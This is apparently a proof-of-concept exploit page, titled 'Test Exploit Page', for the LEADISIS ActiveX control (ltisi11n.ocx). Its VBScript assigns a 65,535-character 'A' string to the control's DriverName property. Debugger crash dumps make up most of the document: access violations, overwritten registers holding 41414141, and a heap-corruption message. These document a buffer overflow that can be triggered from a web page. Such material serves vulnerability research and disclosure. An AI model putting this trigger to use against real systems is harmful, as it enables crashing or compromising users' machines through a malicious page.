<html>
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype  = "Property Let DriverName As String"
memberName = "DriverName"
progid     = "LEADISISLib.LEADISIS"
argCount   = 1

arg1=String(65535, "A")

target.DriverName = arg1

</script>


Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9	MOV [EDX],AL

Seh Chain:
--------------------------------------------------
1 	7C839AD8 	KERNEL32.dll
2 	73352960 	VBSCRIPT.dll
3 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
KERNEL32.7C80BEB9             ltisi11n.AA1537               
ltisi11n.AA1537               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             ltisi11n.AA64D7               
ltisi11n.AA64D7               ltisi11n.AA319B               
ltisi11n.AA319B               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.73311302             
VBSCRIPT.73311302             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0


Block Disassembly: 
--------------------------------------------------
7C80BEA3	PUSH 7C80BED0
7C80BEA8	CALL 7C8024D6
7C80BEAD	AND DWORD PTR [EBP-4],0
7C80BEB1	MOV ECX,[EBP+C]
7C80BEB4	MOV EDX,[EBP+8]
7C80BEB7	MOV AL,[ECX]
7C80BEB9	MOV [EDX],AL	  <--- CRASH
7C80BEBB	INC ECX
7C80BEBC	INC EDX
7C80BEBD	TEST AL,AL
7C80BEBF	JNZ SHORT 7C80BEB7
7C80BEC1	OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5	MOV EAX,[EBP+8]
7C80BEC8	CALL 7C802511
7C80BECD	RETN 8


ArgDump:
--------------------------------------------------
EBP+8	02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12	0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16	41414141
EBP+20	41414141
EBP+24	41414141
EBP+28	41414141


Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00  [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C  [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02  [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]



Exception Code: ACCESS_VIOLATION
Disasm: 7C919084	MOV ECX,[EBX]

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C90E920 	ntdll.dll
4 	7C90E920 	ntdll.dll
5 	73352960 	VBSCRIPT.dll
6 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C919084                ntdll.7C96EEA0                
ntdll.7C96EEA0                ntdll.7C94B394                
ntdll.7C94B394                ntdll.7C918F21                
ntdll.7C918F21                ltisi11n.AA69BC               
ltisi11n.AA69BC               ltisi11n.AA7189               
ltisi11n.AA7189               ltisi11n.AA154C               
ltisi11n.AA154C               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             ltisi11n.AA64D7               
ltisi11n.AA64D7               ltisi11n.AA319B               
ltisi11n.AA319B               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.73311302             
VBSCRIPT.73311302             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C


Block Disassembly: 
--------------------------------------------------
7C91906D	MOV [EBP-25],AL
7C919070	LEA EAX,[ESI+8]
7C919073	MOV EDI,[EAX]
7C919075	MOV [EBP-1E4],EDI
7C91907B	MOV EBX,[ESI+C]
7C91907E	MOV [EBP-164],EBX
7C919084	MOV ECX,[EBX]	  <--- CRASH
7C919086	CMP ECX,[EDI+4]
7C919089	JNZ 7C92CC59
7C91908F	CMP ECX,EAX
7C919091	JNZ 7C92CC59
7C919097	PUSH ESI
7C919098	PUSH DWORD PTR [EBP-1C]
7C91909B	CALL 7C910684
7C9190A0	MOV [EBX],EDI


ArgDump:
--------------------------------------------------
EBP+8	02A70000 -> 000000C8
EBP+12	50000161
EBP+16	0000001C
EBP+20	02A70000 -> 000000C8
EBP+24	00000000
EBP+28	02A70000 -> 000000C8


Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00  [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00  [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00  [.........`......]



Exception Code: BREAKPOINT
Disasm: 7C90120E	INT3

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C90E920 	ntdll.dll
4 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C90120F                ntdll.7C95F38C                
ntdll.7C95F38C                ntdll.7C96E507                
ntdll.7C96E507                ntdll.7C96F75E                
ntdll.7C96F75E                ntdll.7C94BC4C                
ntdll.7C94BC4C                ntdll.7C927573                
ntdll.7C927573                ltisi11n.AA69F4               
ltisi11n.AA69F4               VBSCRIPT.733015F2             
VBSCRIPT.733015F2             VBSCRIPT.7331EEE1             
VBSCRIPT.7331EEE1             VBSCRIPT.7331F192             
VBSCRIPT.7331F192             VBSCRIPT.7331F632             
VBSCRIPT.7331F632             VBSCRIPT.73321CB3             
VBSCRIPT.73321CB3             SCROBJ.5CE448DD               
SCROBJ.5CE448DD               SCROBJ.5CE49EEA               
SCROBJ.5CE49EEA               SCROBJ.5CE49E41               
SCROBJ.5CE49E41               1013CE7                       
1013CE7                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139


Block Disassembly: 
--------------------------------------------------
7C9011FF	TEST BYTE PTR [ESI+10],10
7C901203	JE 7C90FEF6
7C901209	POP ESI
7C90120A	LEAVE
7C90120B	RETN 4
7C90120E	INT3
7C90120F	RETN	  <--- CRASH
7C901210	MOV EDI,EDI
7C901212	INT3
7C901213	RETN
7C901214	MOV EDI,EDI
7C901216	MOV EAX,[ESP+4]
7C90121A	INT3
7C90121B	RETN 4
7C90121E	MOV EAX,FS:[18]


ArgDump:
--------------------------------------------------
EBP+8	02A71EF0 -> 000B0041
EBP+12	02A71EF0 -> 000B0041
EBP+16	02A70000 -> 000000C8
EBP+20	02A71EF0 -> 000B0041
EBP+24	0013F100 -> 0013F174
EBP+28	7C96E507 -> 3374C084


Stack Dump:
--------------------------------------------------
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02  [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00  [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02  [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02  [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40  [............`...]



Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478	CMP BYTE PTR [EBX+7],FF

Seh Chain:
--------------------------------------------------
1 	7C90E920 	ntdll.dll
2 	7C90E920 	ntdll.dll
3 	7C839AD8 	KERNEL32.dll
4 	7C90E920 	ntdll.dll
5 	7C839AD8 	KERNEL32.dll
6 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.7C96E478                ntdll.7C96FA1D                
ntdll.7C96FA1D                ntdll.7C94D281                
ntdll.7C94D281                KERNEL32.7C834D23             
KERNEL32.7C834D23             LTKRN11n.2001087F             
LTKRN11n.2001087F             ntdll.7C913A43                
ntdll.7C913A43                KERNEL32.7C80C136             
KERNEL32.7C80C136             KERNEL32.7C80B72F             


Registers:
--------------------------------------------------
EIP 7C96E478
EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000


Block Disassembly: 
--------------------------------------------------
7C96E468	PUSH EBX
7C96E469	MOV EBX,[EBP+C]
7C96E46C	TEST EBX,EBX
7C96E46E	PUSH ESI
7C96E46F	MOV ESI,[EBP+8]
7C96E472	JE 7C96E53E
7C96E478	CMP BYTE PTR [EBX+7],FF	  <--- CRASH
7C96E47C	JNZ SHORT 7C96E4BC
7C96E47E	CMP BYTE PTR [ESI+586],2
7C96E485	JNZ SHORT 7C96E48F
7C96E487	MOV EAX,[ESI+580]
7C96E48D	JMP SHORT 7C96E491
7C96E48F	XOR EAX,EAX
7C96E491	TEST EAX,EAX
7C96E493	JE 7C96E53E


ArgDump:
--------------------------------------------------
EBP+8	00150000 -> 000000C8
EBP+12	FFFFFFF8
EBP+16	7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20	00000000
EBP+24	00000000
EBP+28	00000003


Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C  [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00  [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E  [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00  [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C  [................]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------

HEAP[wscript.exe]: 
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec

